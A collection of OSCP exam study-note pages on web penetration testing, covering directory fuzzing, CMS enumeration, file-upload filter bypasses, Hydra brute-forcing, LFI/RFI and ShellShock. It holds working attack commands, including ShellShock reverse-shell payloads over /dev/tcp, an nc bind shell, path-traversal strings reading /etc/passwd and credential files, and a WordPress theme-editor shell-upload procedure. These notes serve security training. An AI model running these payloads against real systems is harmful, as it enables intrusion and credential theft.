### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#ignoring-particular-status-code) Ignoring particular status code Copy ffuf -w /opt/dirsearch/big.txt -u http://10.10.191.30:80/FUZZ -fc 401 ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#vhost-fuzzing) VHOST Fuzzing Copy ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" -u http://horizontall.htb ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#extension) Extension Copy ffuf -w /opt/dirsearch/big.txt -u http://bounty.htb/FUZZ -e .asp,.aspx,.txt [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#gobuster) GoBuster ------------------------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#normal-scan) Normal Scan Copy gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -x txt,php ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#append-to-each-request) Append / to each request Sometimes it's necessary to look only for directories and not for files so we can append / to every request to look for only **directories** Copy gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#dirsearch) **DirSearch** ------------------------------------------------------------------------------------------------ Copy dirsearch.py -u http://10.10.10.5:80/ -e txt,asp,aspx [](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing#some-extension) Some Extension ------------------------------------------------------------------------------------------------------ Copy sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar [PreviousCMS](https://gabb4r.gitbook.io/oscp-notes/web-http/cms) [NextFile Upload](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload) Last updated 4 years ago --- # Bruteforcing extensions | OSCP Notes * We can fuzz the extensions to find out which extensions are not blocked, * we will use burpsuite for this Some useful extensions - * **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._phps_, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc_ * **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_ * **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_ * **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_ * **Flash**: _.swf_ * **Perl**: _.pl, .cgi_ * **Erlang Yaws Web Server**: _.yaws_ Now make list of extensions and add it to **intruder** to FUZZ and check out which one is worked ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkhrGxfCdSICAPRKOr2%252F-MkhsTC-PyauoclsY_dd%252Fimage.png%3Falt%3Dmedia%26token%3Dec983935-0b18-47c0-89f3-a074bca10b89&width=768&dpr=4&quality=100&sign=c55a5dac&sv=2) Note: Make sure **url-encodin**g is unchecked in payload section, as it will unless encode our dot and we will not get desire results , [PreviousBypass file upload filtering](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/bypass-file-upload-filtering) [NextWebDAV](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/webdav) Last updated 4 years ago --- # CMS | OSCP Notes * Enumerate version and few other details * Google their vulnerability [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#wordpress) Wordpress ------------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#admin-page) admin page Copy /wp-admin /wp-login ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#configuration-files) Configuration files Copy setup-config.php wp-config.php ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#enumerate-users) Enumerate users Copy /?author=1, /?author=2, ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#uploading-shell-in-wp_theme) Uploading shell in WP\_THEME 1. Login into WP\_dashboard and explore the appearance tab. ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkhlfUhkAmKvXkyvk4A%252F-MkhmDkCGMVhTws9XyzE%252Fimage.png%3Falt%3Dmedia%26token%3Dc7f319c2-b8db-4433-9139-57c20a806d6f&width=768&dpr=4&quality=100&sign=c5763e44&sv=2) 2\. Now go in **Themes** section under **Appearance** and select **Editor** and there select **twenty fifteen templet** and get into **404.php** 3\. You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver. ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkhlfUhkAmKvXkyvk4A%252F-Mkhn29nkNanhnyXTdGG%252Fimage.png%3Falt%3Dmedia%26token%3D57ec543e-02e5-4f9f-9739-14a33d4beaad&width=768&dpr=4&quality=100&sign=de29a7f5&sv=2) 4\. Update the file and go to following url - **http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php** **5\.** you will have your session upon execution of 404.php file. :) [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#drupal) Drupal ------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#droopescan) Droopescan Copy droopescan scan drupal -u http://example.org/ -t 32 ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#find-version) Find version /CHANGELOG.txt [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#adobe-cold-fusion) Adobe Cold Fusion ---------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#determine-version) Determine version Copy /CFIDE/adminapi/base.cfc?wsdl ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#version-8-vulnerability) Version 8 Vulnerability * fckeditor * LFI `http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en` [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#elastix) Elastix -------------------------------------------------------------------------- * Google the vulnerabitlities * default login are `admin:admin` at `/vtigercrm/` * able to upload shell in profile-photo ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#id-2.2.0-graph.php-local-file-inclusion) 2.2.0 - 'graph.php' Local File Inclusion `http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action` Note: Most probably this will be same password for root user too , so you can directly ssh through it [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#joomla) Joomla ------------------------------------------------------------------------ * Admin page - `/administrator` * Configuration files Copy configuration.php diagnostics.php joomla.inc.php config.inc.php [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#mambo) Mambo ---------------------------------------------------------------------- #### [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#config-files) Config files Copy configuration.php config.inc.php [](https://gabb4r.gitbook.io/oscp-notes/web-http/cms#zyxel) ZyXel ---------------------------------------------------------------------- Configuration files Copy /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) # Config Backups /RestoreCfg.html /BackupCfg.html [PreviousWeb Scanning](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners) [NextDirectory Fuzzing](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing) Last updated 4 years ago --- # Bypass file upload filtering | OSCP Notes * Rename it * upload it as shell.php.jpg * Blacklisting bypass, change extension * `php phtml, .php, .php3, .php4, .php5, and .inc` * bypassed by uploading an unpopular php extensions. such as: `pht, phpt, phtml, php3, php4, php5, php6` * asp `asp, .aspx` * perl `.pl, .pm, .cgi, .lib` * jsp `.jsp, .jspx, .jsw, .jsv, and .jspf` * Coldfusion `.cfm, .cfml, .cfc, .dbm` * Whitelisting bypass * Bypassed by uploading a file with some type of tricks, * Like adding a null byte injection like (`shell.php%00.gif` ). Or by using double extensions for the uploaded file like ( `shell.jpg.php`) * GIF89a; * If they check the content. Basically you just add the text "GIF89a;" before you shell-code. Copy GIF89a; [](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/bypass-file-upload-filtering#exiftool) ExifTool ----------------------------------------------------------------------------------------------------------------- Copy 1. //shell.php 2. exiftool "-comment<=shell.php" malicious.png 3. strings malicious.png | grep system [PreviousFile Upload](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload) [NextBruteforcing extensions](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/bruteforcing-extensions) Last updated 4 years ago --- # Web Scanning | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#nmap-script) Nmap Script ------------------------------------------------------------------------------------------------- Copy nmap --script=http-enum nmap --script=http-vuln* $ip [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#banner-grabbing) Banner grabbing --------------------------------------------------------------------------------------------------------- Copy ./whatweb $ip # identifies all known services [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#nikto) Nikto ------------------------------------------------------------------------------------- Nikto is a very popular and easy to use webserver assessment tool to find potential problems and vulnerabilities quickly. Nikto is written in Perl and comes standard as a tool with Kali Linux. Personally, I think that Nikto is a great choice to quickly enumerate a webserver, identify the web applications running on it and test for common vulnerabilities. During the scanning process Nikto searches for potential security problems in the form of misconfigurations, default files and folders, insecure objects and outdated software. **You should know that Nikto is not designed to be stealthy.** It scans the target host in the fastest way possible and generates a lot of requests which makes the scanning process very obvious in web server log files and to intrusion detection systems (IDS). Copy nikto -h $ip nikto -h $ip -p 80,8080,1234 #test different ports with one scan Copy -Tuning Options 0 – File Upload 1 – Interesting File / Seen in logs 2 – Misconfiguration / Default File 3 – Information Disclosure 4 – Injection (XSS/Script/HTML) 5 – Remote File Retrieval – Inside Web Root 6 – Denial of Service 7 – Remote File Retrieval – Server Wide 8 – Command Execution / Remote Shell 9 – SQL Injection a – Authentication Bypass b – Software Identification c – Remote Source Inclusion x – Reverse Tuning Options (i.e., include all except specified) $ nikto -Display 1234EP -o report.html -Format htm -Tuning 123bde -host 192.168.0.102 # Command [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#wordpress-scan) Wordpress scan ------------------------------------------------------------------------------------------------------- WPScan is a popular WordPress vulnerability scanner that can be used to find known vulnerabilities in WordPress, enumerate users, themes and plugins and run dictionary attacks on the user accounts. WordPress is a very popular blogging platform and is used by numerous websites. The blogging platform is easy to install and can be customized using a lot of (free) plugins and themes. Because of its popularity among bloggers and website owners, it is also a popular target for (black hat) hackers. The reason it’s so popular among hackers is not only because WordPress itself has a long history of severe vulnerabilities, but also because WordPress plugins and themes can introduce vulnerabilities. Website administrators who do not keep up with WordPress updates and do not take appropriate security measures, such as installing Website Application Firewalls (WAFs), can become easy targets that even the most inexperienced hackers can take advantage of. Sooner or later you will encounter WordPress blogs on penetration testing assignments or maybe you plan to run your own blog someday. Therefore, we will learn how to test a WordPress website for vulnerabilities with WPScan and run some automated tests. ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#updating-db-of-wpscan) Updating DB of WPScan Copy wpscan --update ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#scanning-the-target) Scanning the target Copy wpscan --url ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#active-enumeration) Active Enumeration * Just because WPScan is unable to find plugins with the default scan it doesn’t mean that the WordPress website doesn’t have plugins installed. The default scan option enumerates plugins using passive detection meaning that it only scans the main page and searches for traces of plugins in the HTML content, JavaScript and CSS files. * However, we can also run more aggressive scans with WPScan that actively test WordPress installations for plugins and themes. Depending on the options selected, an active scan tries every plugin from the database to test if it’s present on the target system. Active scans usually yield a much more reliable result. Let’s have a look at the different options available for actively scanning a website for plugins. The following parameters can be used in conjunction with the enumerate option: 1. **p**: Scans popular plugins only. 2. **vp**: Scans vulnerable plugins only. 3. **ap**: Scans all plugins. * To enable the active/aggressive scan option to scan for all plugins we also have to set the aggressive mode using the --plugins-version-detection option. The same options are available for WordPress themes: 1. **t**: Scans popular themes only. 2. **vt**: Scans vulnerable themes only. 3. **at**: Scans all themes. Copy wpscan --url [url] --enumerate [p/vp/ap/t/vt/at] --plugins-detection aggressive To scan for all plugins Copy wpscan --url [url] --enumerate ap --plugins-detection aggressive ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#enumerating-wordpress-users) **Enumerating wordpress users** Copy wpscan --url [target URL] --enumerate u ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#password-attack) **Password Attack** Copy wpscan --url http://internal.thm/blog/ --passwords /opt/wordlists/rockyou.txt ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#scanning-with-api-tokens) **Scanning with Api Tokens** Copy wpscan --url https://brainfuck.htb --api-token ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#disable-tls-checks) **Disable-tls-checks** Copy wpscan --url https://brainfuck.htb --disable-tls-checks --api-token [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#backup-files-search) Backup files search ----------------------------------------------------------------------------------------------------------------- Copy ./bfac --url http://$ip/ --level 4 An automated tool that checks for backup artifacts that may disclose the web-application's source code. [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#webdav) WebDav --------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#davtest) Davtest DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable. Copy davtest --url http://10.11.1.10:80 ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#cadaver) Cadaver We can use cadaver client to login into WebDav and can put the web shell to execute Copy $ cadaver http://192.168.1.103/dav/ put /tmp/shell.php [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#uniscan) Uniscan ----------------------------------------------------------------------------------------- LFI, RFI, and RCE vulnerability scanner Copy uniscan -u http://192.168.1.202/ -qd [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#git) GIT --------------------------------------------------------------------------------- #### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#download-git) Download .git Copy mkdir ./gitdumper.sh /.git/ #### [](https://gabb4r.gitbook.io/oscp-notes/web-http/automated-scanners#extract-git-content) Extract .git content Copy mkdir ./extractor.sh [PreviousMsSQL (Port 1433)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/mssql-port-1433) [NextCMS](https://gabb4r.gitbook.io/oscp-notes/web-http/cms) Last updated 4 years ago --- # File Upload | OSCP Notes Here we will discuss some file upload bugs that leads to gaining access to the system, [PreviousDirectory Fuzzing](https://gabb4r.gitbook.io/oscp-notes/web-http/directory-fuzzing) [NextBypass file upload filtering](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/bypass-file-upload-filtering) Last updated 4 years ago --- # WebDAV | OSCP Notes We can use `cadaver` to upload the shell Copy $ cadaver http://192.168.1.103/dav/ put /tmp/shell.php [PreviousBruteforcing extensions](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/bruteforcing-extensions) [NextBruteforce Authentication](https://gabb4r.gitbook.io/oscp-notes/web-http/bruteforce-authentication) Last updated 4 years ago --- # Bruteforce Authentication | OSCP Notes Most web applications use one or more login forms for accessing restricted user functionality and administration panels. When you fill out a simple web form with a username and password and then press submit, the authentication mechanism generates an HTTP GET or HTTP POST request. This request (which contains the username, password and some other necessary values generated in the background) is sent to the webserver where the credentials are tested. **The first step in the exploitation process is to intercept the request (once the required form values have been entered and after the submit button is pressed) before it is sent to the remote server. In this way it is possible to see what values are submitted and which are required by the form.** An attacker can modify the username and password values repeatedly and send the request to the remote server using Burp Suite or Hydra. [](https://gabb4r.gitbook.io/oscp-notes/web-http/bruteforce-authentication#http-get) HTTP-GET -------------------------------------------------------------------------------------------------- Copy hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path [](https://gabb4r.gitbook.io/oscp-notes/web-http/bruteforce-authentication#http-post) HTTP-POST ---------------------------------------------------------------------------------------------------- Copy hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin [](https://gabb4r.gitbook.io/oscp-notes/web-http/bruteforce-authentication#send-request-along-with-cookies) Send request along with cookies ------------------------------------------------------------------------------------------------------------------------------------------------ Consider following request: ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkhuAAix2BDr97EAxPp%252F-MkhvMIv_acGaPxJI-7B%252Fimage.png%3Falt%3Dmedia%26token%3Dd2dd3ac0-6693-4d54-aced-11b9e1009ab2&width=768&dpr=4&quality=100&sign=42784fcf&sv=2) As can be seen in the first line of the screenshot, the GET request in this form includes a third parameter called Login. The login parameters contain a static value indicating a login action which will be added to the Hydra http-get-form parameter as a third variable after the username and password variables. There is also a cookie with information such as the DVWA security level and a PHP session ID. **To make Hydra use the Cookie we also need to add the H parameter to the request** followed by the information we see in line 8 of the screenshot: the security parameter (i.e. low) and the PHP session id (PHPSESSID) value shown in red. After making these modifications the http-form-get parameter will look as follows: Copy hydra 10.11.1.250 -t 2 -l admin -P /usr/share/wordlists/rockyou.txt http-form-get "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=409e45633a8281adb8f182021cfacd14" [PreviousWebDAV](https://gabb4r.gitbook.io/oscp-notes/web-http/file-upload/webdav) [NextLFI and RFI](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi) Last updated 4 years ago --- # Post Requests | OSCP Notes Sometimes we need to send post request to target system in order to do some tasks , so here we will how we can use `curl` and `python` in order to send **POST** request [](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests#curl) Curl ------------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests#basic-syntax) Basic Syntax Copy curl -x POST http://example.com ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests#sending-additional-data) Sending Additional Data Copy curl -d "user=user1&pass=abcd" -X POST https://example.com/login ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests#upload-files-through-post) Upload Files through POST Copy # POST file curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie" # POST binary data to web form curl -F "field=' http://192.168.2.99/shell.php [](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests#python) Python ---------------------------------------------------------------------------------- Copy import requests url = 'https://www.w3schools.com/python/demopage.php' myobj = {'somekey': 'somevalue'} x = requests.post(url, data = myobj) print(x.text) [PreviousShellShock](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock) [NextBrute-force service password](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password) Last updated 4 years ago --- # LFI and RFI | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi#lfi-basics) LFI Basics ---------------------------------------------------------------------------------------- Local File Inclusion (LFI) vulnerabilities allow an attacker to use specifically crafted requests to read local files on the web server (including log files and configuration files containing password hashes or even clear text passwords). LFI vulnerabilities can also lead to remote code execution on the target web server and a denial of service (DoS). Most, if not all, web application frameworks support file inclusion and file inclusion vulnerabilities are often the result of poor user input validation. * We can simply pull out lfi with following syntax : Consider this example `http://192.168.119.13/include?page=index.php` It calling **index.php** through php function so we can try if it can able to call and print other files too for us `http://192.168.119.13/include?page=/etc/passwd` `http://192.168.119.13/include?page=../../../../../etc/passwd` And if we got **/etc/passwd** output back , target is vulnerable to **LFI** [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi#rfi-basic) RFI Basic -------------------------------------------------------------------------------------- * RFI stands for Remote File Inclusion. Where LFI includes files on stored on the local system, RFI includes files from remote locations, on a web server for example. Let’s see if we can include a remote file too on the DVWA application by entering an external URL in the page parameter. For this demonstration we have loaded a text file named exploit.txt on a remote server with the IP address 172.16.1.4 (because the text file is on a remote server we don’t have to work with a current working directory with the ../ value but we can reference it directly): * Remote File Inclusions (RFI) are very similar to LFI but affect files on remote servers instead of files on the local web server. Remote files can include malicious code that executes on the server in the context of the user running the web server or on any client devices that visit a compromised webpage. We can exploit rfi with adding our own shell at the end of vulnerable endpoint , something like this `http://10.11.1.250/dvwa/vulnerabilities/fi/?page=http://172.16.1.4/exploit.txt` ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi#required-settings-to-work-rfi) Required Settings to work RFI ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkjfhGHbsTte5s24ZSM%252F-Mkji-tKDEQzpiWo9jYT%252Fimage.png%3Falt%3Dmedia%26token%3Dc0045a32-9c06-4743-9d9b-812670b1135a&width=768&dpr=4&quality=100&sign=76b69ed3&sv=2) The first warning indicates that URL file-access is disabled in the server configuration. Without URL file access enabled we’re unable to include files from remote locations, such as our attack box.**To successfully include remote files in PHP there are a few parameters in the "php.ini" file that must be enabled:** **allow\_url\_fopen = On** **allow\_url\_include = On** This settings can be found on **phpinfo.php** page so we can check if following configuration is allowed or not to successfully attack rfi `http://10.11.1.250/dvwa/phpinfo.php` [PreviousBruteforce Authentication](https://gabb4r.gitbook.io/oscp-notes/web-http/bruteforce-authentication) [NextInteresting Files for LFI](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled) Last updated 4 years ago --- # Compiling the Exploit | OSCP Notes * Sometimes you encounter target running older or vulnerable version of kernel and quick google will give you require exploit code to run and gain root privileges , but in most case , this exploit will come as piece of c code and not as binary so you can't run it without compiling it first , * So you can use gcc or any other appropriate compiling tools to compile the code and run it. * You might be asking yourself what you should do if the exploit does not contain any compilation instructions. Fortunately, most of them do as it’s good practice to document code, but in case not, you need to use common sense and know how to troubleshoot errors. It is obvious that we need to specify the input file containing the source code to be compiled. It’s equally obvious that we have to specify an output file since we’re transforming source code (input) to a binary file (output). Less obvious is the '-pthread' flag that we used to compile the DirtyCOW exploit above. This flag is required for compiling the exploit, but let’s see what happens if we omit the pthread flag: ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkk476RGcMmGKF6KSYu%252F-Mkk5ZG8tWJuUvKmvnLv%252Fimage.png%3Falt%3Dmedia%26token%3De88235de-27ab-454b-b466-b7d73a3cf3da&width=768&dpr=4&quality=100&sign=fe5ac37c&sv=2) The compilation process fails because there are some undefined references to ‘pthread\_create’ and ‘pthread\_join’ in the source code, * A simple Google search on this error would reveal numerous posts and solutions related to this problem on sites like Stack Overflow, adding the -pthread flag included. The information found there will not only help you in troubleshooting compilation errors, but also teach you why these errors occur so you can recognize and know how to deal with them the next time they occur. * While the number of different compilation options, warnings and errors might seem intimidating at first (especially if you don’t have a lot of experience with programming) try to see every warning/error/option as a learning opportunity. Google every warning and error and try to understand the provided solutions. Also investigate why certain libraries are required, as we did with the pthread library, and understand the relation to the program’s functionality. This will get you a better understanding of what’s happening which will help you to deal more effectively and efficiently with compiling exploits in the future. [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit#local-vs-remote-compilation) **Local vs Remote compilation** ------------------------------------------------------------------------------------------------------------------------------------------- If the remote host has compilation tools installed like GCC, it is best to **compile the exploit on the target host.** This can save you trouble with missing packages, dependencies and system specific variables (such as the architecture). If the target host does not have the right tools available to compile exploits, then you will have to compile the exploit locally on your attack box and then transfer the compiled exploit to the target. Before compiling the exploit, you will need to make sure that all dependencies required for the target host environment have been met. For example, when the target host runs a 32-bit OS and your attack box has a 64-bit OS, you have to install the 32-bit versions of all the libraries required. For cross-compiling exploits for a different processor architecture you can install gcc-multilib (apt-get install gcc-multilib) and add -m32 for 32-bit or -m64 for 64-bit to the compilation command. [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit#linux-binaries) **Linux Binaries** ----------------------------------------------------------------------------------------------------------------- **Basic Syntax** Copy gcc cowroot.c -o cowroot **For 32 bit environment** Copy gcc -m32 input.c -o output **For 64 bit environment** Copy gcc -m64 input.c -o output [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit#windows-binaries) Windows Binaries ----------------------------------------------------------------------------------------------------------------- **For 32 bit environment** Copy i686-w64-mingw32-gcc -o main32.exe main.c **For 64 bit environment** Copy x86_64-w64-mingw32-gcc -o main64.exe main.c \====> Note that these Windows executables will not work inside Linux Subsystem, only outside of it. [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit#python-to-exe) **Python to Exe** --------------------------------------------------------------------------------------------------------------- Copy pyinstaller --onefile test.py # will save executable in dist folder [PreviousSearchsploit](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit) [NextBind and Reverse shell](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell) Last updated 4 years ago --- # ShellShock | OSCP Notes Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an **attacker can tack-on malicious code to the environment variable, which will run once the variable is received**. ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkjlkqM44o6R2dylsgC%252F-Mkjnj_NdaaMGiwxvhRV%252Fimage.png%3Falt%3Dmedia%26token%3D380ac009-facf-4fa8-a3c4-2dfd9fab386c&width=768&dpr=4&quality=100&sign=f8422cda&sv=2) Exploiting this vulnerability the **page could throw an error**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** (with cgi folder) or using **nikto** [](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock#exploitation-steps) **Exploitation Steps** ----------------------------------------------------------------------------------------------------------- * check for any cgi file on server , * If you found any directory of **/cgi-bin/** use extension like **sh** and **cgi** and bruteforce the directory Copy sudo python3 dirsearch.py -u http://10.10.10.56:80/cgi-bin/ -e cgi,sh * If you found any **.sh or .cgi file** , you can use **shellshock reverse shell** to connect back to us * We can put payload into **useragent** to execute it - Copy curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status Copy echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80 [](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock#nse) NSE ------------------------------------------------------------------------- Copy nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi [](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock#shocker) Shocker --------------------------------------------------------------------------------- Copy $ git clone https://github.com/nccgroup/shocker cd shocker ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose [](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock#shellshock-over-ssh) ShellShock over ssh --------------------------------------------------------------------------------------------------------- Copy $ ssh username@$ip '() { :;}; /bin/bash' [PreviousPHP Wrappers](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/php-wrappers) [NextPost Requests](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests) Last updated 4 years ago --- # Null Byte Injection | OSCP Notes * **Useful in case where php adding extension at the end of file name** * In some specific cases you need to add a null byte terminator to the LFI/RFI vulnerable parameter. **A Null byte is a byte with the value zero (%00 or 0x00 in hex) and represents a string termination point or delimiter character.** Adding a null byte to a payload can alternate intended program logic as **it immediately stops the string from further processing any bytes after the null byte. This means that any bytes after the null byte delimiter will be ignored.** [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/null-byte-injection#example) **Example** ---------------------------------------------------------------------------------------------------------- 